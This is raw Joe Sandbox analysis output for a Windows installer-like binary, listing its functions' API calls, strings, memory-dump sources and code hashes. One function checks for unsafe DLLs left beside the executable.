browcli.dll, xrefs: 00007FF7BB24E301
WINNSI.DLL, xrefs: 00007FF7BB24E275
comres.dll, xrefs: 00007FF7BB24E0F4
cabinet.dll, xrefs: 00007FF7BB24E1DB
clbcatq.dll, xrefs: 00007FF7BB24E0E9
sfc_os.dll, xrefs: 00007FF7BB24E091
dnsapi.DLL, xrefs: 00007FF7BB24E259
SSPICLI.DLL, xrefs: 00007FF7BB24E09C
userenv.dll, xrefs: 00007FF7BB24E15D
lpk.dll, xrefs: 00007FF7BB24E0D3
version.dll, xrefs: 00007FF7BB24E07B
SetDefaultDllDirectories, xrefs: 00007FF7BB24E053
DXGIDebug.dll, xrefs: 00007FF7BB24E086, 00007FF7BB24E5B6
mpr.dll, xrefs: 00007FF7BB24E291
cryptsp.dll, xrefs: 00007FF7BB24E355
samcli.dll, xrefs: 00007FF7BB24E2C9
netapi32.dll, xrefs: 00007FF7BB24E16B
secur32.dll, xrefs: 00007FF7BB24E1CD

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
API String ID: 1496594111-2013832382
Opcode ID: 7c4a34b53ce793e8483b627db677786fa0ac65cb43c3a9d0b7710463073bebd5
Instruction ID: 141b2ba5e31a7058ec1c95d9c20243836e359592805bccce569d69f87cd1810c
Opcode Fuzzy Hash: 7c4a34b53ce793e8483b627db677786fa0ac65cb43c3a9d0b7710463073bebd5
Instruction Fuzzy Hash: 31320931A09B82A9EB11AF2DE8411E9B3A4FB66354F900236DF4D06B79EF3CD654C354

Function 00007FF7BB2498DC Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 702COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7BB248E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7BB248F8D

_snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7BB249F75
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB24A42F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB24A435

Part of subcall function 00007FF7BB250BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7BB250B44), ref: 00007FF7BB250BE9

Strings

STRINGS, xrefs: 00007FF7BB249DC1
MENU, xrefs: 00007FF7BB249DD9
*messages***, xrefs: 00007FF7BB249BC6
DIALOG, xrefs: 00007FF7BB249DCD
, xrefs: 00007FF7BB249DF9
$%s:, xrefs: 00007FF7BB249F50
*messages***, xrefs: 00007FF7BB249C04
DIRECTION, xrefs: 00007FF7BB249DE5
,, xrefs: 00007FF7BB249FAA
RTL, xrefs: 00007FF7BB249F2E
@%s:, xrefs: 00007FF7BB249F57

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
API String ID: 3629253777-3268106645
Opcode ID: 137a8823fd4522e36ba74be14e40dc9d8de557d7e1016f60fbe5fb59c02e5768
Instruction ID: 79462e5aa2b7836cd35c3848e705c65d7b5044e9fadb6ca6be3da95ac9889090
Opcode Fuzzy Hash: 137a8823fd4522e36ba74be14e40dc9d8de557d7e1016f60fbe5fb59c02e5768
Instruction Fuzzy Hash: FF62A022A19A4285EB10EB2DD4852FDA361FB67784FC05131DF4E47AADEF38E945C360

Function 00007FF7BB261900 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 195
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7BB261558: DloadProtectSection.DELAYIMP ref: 00007FF7BB2615C9

RaiseException.KERNEL32 ref: 00007FF7BB2619A7
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00007FF7BB261993

Part of subcall function 00007FF7BB261868: DloadProtectSection.DELAYIMP ref: 00007FF7BB2618C7

LoadLibraryExA.KERNELBASE ref: 00007FF7BB261A46
GetLastError.KERNEL32 ref: 00007FF7BB261A54
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00007FF7BB261A86
RaiseException.KERNEL32 ref: 00007FF7BB261A9A

Strings

H, xrefs: 00007FF7BB261974

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
String ID: H
API String ID: 3432403771-2852464175
Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
Instruction ID: c2d6e227a3b047790646567e59e090eaa409d489500d56d461c7c8cddc2ace89
Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
Instruction Fuzzy Hash: 36916D22A15B128AEB00DF6ED8442ECB3A1BB19B55B855435CF0E57768EF38E845C320

Function 00007FF7BB25F4E0 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 285
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32 ref: 00007FF7BB25F747
ShowWindow.USER32 ref: 00007FF7BB25F786
GetExitCodeProcess.KERNEL32 ref: 00007FF7BB25F7BD
CloseHandle.KERNEL32 ref: 00007FF7BB25F7E7
ShowWindow.USER32 ref: 00007FF7BB25F83F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB25F8FB

Strings

.exe, xrefs: 00007FF7BB25F7F2
Install, xrefs: 00007FF7BB25F684
p, xrefs: 00007FF7BB25F529
.inf, xrefs: 00007FF7BB25F675

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
String ID: .exe$.inf$Install$p
API String ID: 1054546013-3607691742
Opcode ID: db8ecbd514ff322f29a974296a08b1056670a56b0f2c036ad5285174391dee78
Instruction ID: 697f4244138c66917e66768090bcb85ed25832db8f129b191e89ca611cf19078
Opcode Fuzzy Hash: db8ecbd514ff322f29a974296a08b1056670a56b0f2c036ad5285174391dee78
Instruction Fuzzy Hash: BCC18122F1960295FA00EB2DD9842F9A361BFAAB84F844435DF4D476BDDF3CE8558324

Function 00007FF7BB25F0A4 Relevance: 16.6, APIs: 11, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7BB25AE1C: PeekMessageW.USER32 ref: 00007FF7BB25AE32
Part of subcall function 00007FF7BB25AE1C: GetMessageW.USER32 ref: 00007FF7BB25AE49
Part of subcall function 00007FF7BB25AE1C: IsDialogMessageW.USER32 ref: 00007FF7BB25AE60
Part of subcall function 00007FF7BB25AE1C: TranslateMessage.USER32 ref: 00007FF7BB25AE6F
Part of subcall function 00007FF7BB25AE1C: DispatchMessageW.USER32 ref: 00007FF7BB25AE7A

GetDlgItem.USER32 ref: 00007FF7BB25F0E3
ShowWindow.USER32 ref: 00007FF7BB25F109
IsDlgButtonChecked.USER32 ref: 00007FF7BB25F11E
IsDlgButtonChecked.USER32 ref: 00007FF7BB25F136
IsDlgButtonChecked.USER32 ref: 00007FF7BB25F157
IsDlgButtonChecked.USER32 ref: 00007FF7BB25F173
IsDlgButtonChecked.USER32 ref: 00007FF7BB25F1B6
IsDlgButtonChecked.USER32 ref: 00007FF7BB25F1D4
IsDlgButtonChecked.USER32 ref: 00007FF7BB25F1E8
IsDlgButtonChecked.USER32 ref: 00007FF7BB25F212
IsDlgButtonChecked.USER32 ref: 00007FF7BB25F22A

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
String ID:
API String ID: 4119318379-0
Opcode ID: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
Instruction ID: 5a7ac68433c0ac65be18979e581e0acb4c91ee34bb0cea7585a5388ee9ad0cda
Opcode Fuzzy Hash: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
Instruction Fuzzy Hash: 7241A131B1464286F700AF7DE814BEA6360FB9AB98F841135DE4E07BA9CF3DD4498764

Function 00007FF7BB2424C0 Relevance: 9.2, APIs: 6, Instructions: 164
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FF7BB24259B
GetLastError.KERNEL32 ref: 00007FF7BB2425AE
CreateFileW.KERNEL32 ref: 00007FF7BB24260E
GetLastError.KERNEL32 ref: 00007FF7BB242617
SetFileTime.KERNEL32 ref: 00007FF7BB2426C9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB242736

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3536497005-0
Opcode ID: 731a06aeb1aeb45fbab96b045eb79c55c759261894fecd14d272f4e3d7f6f85d
Instruction ID: cd233301588df8f2b39f786bd7fa2496c247ce600f8e54c19debd222a777494e
Opcode Fuzzy Hash: 731a06aeb1aeb45fbab96b045eb79c55c759261894fecd14d272f4e3d7f6f85d
Instruction Fuzzy Hash: CD610966A18A4185E7209B2EE5003AEA7B1FB9A7A8F501334DF6D07AECCF3DD454C714

Function 00007FF7BB2591E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32 ref: 00007FF7BB259211
SHAutoComplete.SHLWAPI ref: 00007FF7BB259255

Part of subcall function 00007FF7BB2513C4: CompareStringW.KERNEL32 ref: 00007FF7BB2513E3

FindWindowExW.USER32 ref: 00007FF7BB25923F

Strings

EDIT, xrefs: 00007FF7BB25921B, 00007FF7BB259233

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
Instruction ID: 81d8aa24d6a2bde75d5f579b56593dce37db1f2f1c3c35a1a1ed945aeaf3564b
Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
Instruction Fuzzy Hash: CB016231B18A4781FA20BB2DE8613F5A390BFBB744FC40431CE4D46679DE2CD549C660

Function 00007FF7BB242CE0 Relevance: 6.1, APIs: 4, Instructions: 136
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(00007FF7BB248C9A), ref: 00007FF7BB242D22
WriteFile.KERNEL32 ref: 00007FF7BB242D6C
WriteFile.KERNELBASE ref: 00007FF7BB242D9A

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: c0878563cb540de980db5307815f43949119fc8f7ca07e724854b0feeef95fd0
Instruction ID: 5ee871f96460ce1f0b226c17d948130afb94fedd072cf12ff8f6d046ce22e7c3
Opcode Fuzzy Hash: c0878563cb540de980db5307815f43949119fc8f7ca07e724854b0feeef95fd0
Instruction Fuzzy Hash: F151EA22B2994282FA55AB2ED9447FAA350FF66B90F840131DF4D47AB8DF7CE445C320

Function 00007FF7BB2603E0 Relevance: 6.1, APIs: 4, Instructions: 123
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetDlgItemTextW.USER32 ref: 00007FF7BB260556
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB2605C1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB2605C7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB2605CD

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ItemText
String ID:
API String ID: 3750147219-0
Opcode ID: 4545a4d965027abc5525eaa64a011eb323a3d8b8803950167f2ec84c55f0684f
Instruction ID: 5221f54e3f6d42f96e7eb2cff92bc51733991e19993980531a2491022414c3f4
Opcode Fuzzy Hash: 4545a4d965027abc5525eaa64a011eb323a3d8b8803950167f2ec84c55f0684f
Instruction Fuzzy Hash: 6F518162F2465184FB04AB6DD8842ED6321BB6AB94F800635DF1D56AFDDF68D440C320

Function 00007FF7BB242320 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,?,?,00000000,00007FF7BB242927,?,00100000,?,00000001,00000000,00000000,?,00007FF7BB2414C1), ref: 00007FF7BB242348
ReadFile.KERNELBASE ref: 00007FF7BB242367
GetLastError.KERNEL32 ref: 00007FF7BB24239B
GetLastError.KERNEL32 ref: 00007FF7BB2423BA

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
Instruction ID: dc76b0c25d77c66ed6191c51555fb86421ccc96dc039c37f9255f16aac650119
Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
Instruction Fuzzy Hash: 07216B21A2CD4181E6606B1FA4002B9EB70FB67B94F944531DF5D4AAACCF7CD8858762

Function 00007FF7BB24E948 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7BB24ECD8: ResetEvent.KERNEL32 ref: 00007FF7BB24ECF1
Part of subcall function 00007FF7BB24ECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF7BB24ED07

ReleaseSemaphore.KERNEL32 ref: 00007FF7BB24E974
FindCloseChangeNotification.KERNELBASE ref: 00007FF7BB24E993
DeleteCriticalSection.KERNEL32 ref: 00007FF7BB24E9AA
CloseHandle.KERNEL32 ref: 00007FF7BB24E9B7

Part of subcall function 00007FF7BB24EA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF7BB24E95F,?,?,?,00007FF7BB24463A,?,?,?), ref: 00007FF7BB24EA63
Part of subcall function 00007FF7BB24EA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7BB24E95F,?,?,?,00007FF7BB24463A,?,?,?), ref: 00007FF7BB24EA6E

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: CloseReleaseSemaphore$ChangeCriticalDeleteErrorEventFindHandleLastNotificationObjectResetSectionSingleWait
String ID:
API String ID: 2143293610-0
Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
Instruction ID: 008d42f74970035718fe5e222e370ad8cc889a00a26e1b6d69e8faacdfc8dfbf
Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
Instruction Fuzzy Hash: E8012D32A18A9192E649BB2AE5442ADB320FB95B80F404031DF6D07A69CF39E5B48754

Function 00007FF7BB24EAA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00007FF7BB24EAE0
SetThreadPriority.KERNEL32 ref: 00007FF7BB24EB36

Strings

CreateThread failed, xrefs: 00007FF7BB24EAEE

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: Thread$CreatePriority
String ID: CreateThread failed
API String ID: 2610526550-3849766595
Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
Instruction ID: 35f8dee46e6b8282faf522ec3298237cdf9c6d07e9957b09846db64fecacf583
Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
Instruction Fuzzy Hash: E1113A31A18A4285F705BB2DE8412EAB360FBA5B84F944131DF8D0267DDF7CE5858724

Function 00007FF7BB25946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7BB24DFD0: GetSystemDirectoryW.KERNEL32 ref: 00007FF7BB24DDDF

OleInitialize.OLE32 ref: 00007FF7BB259486
SHGetMalloc.SHELL32 ref: 00007FF7BB2594D4

Strings

riched20.dll, xrefs: 00007FF7BB259475

Memory Dump Source

Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true

Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd

Similarity

API ID: DirectoryInitializeMallocSystem
String ID: riched20.dll
API String ID: 174490985-3360196438
Opcode ID: b1936b3f38021c99ecd6522b050f6163774a90ef7a51b133bb98bdb322c125e4
Instruction ID: 5e11fccdfeb2a82176741057aab3304d5d7e32922f70cc125f46c91e2888b077
Opcode Fuzzy Hash: b1936b3f38021c99ecd6522b050f6163774a90ef7a51b133bb98bdb322c125e4
Instruction Fuzzy Hash: 02F03171618A4182EB00AF28E4142AAB3A0FB69754F800135EE8D42768DF7CD55DCB10

Function 00007FF7BB25095C Relevance: 4.7, APIs: 3, Instructions: 152windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7BB25853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF7BB25856C

Part of subcall function 00007FF7BB24AAE0: LoadStringW.USER32 ref: 00007FF7BB24AB67
Part of subcall function 00007FF7BB24AAE0: LoadStringW.USER32 ref: 00007FF7BB24AB80

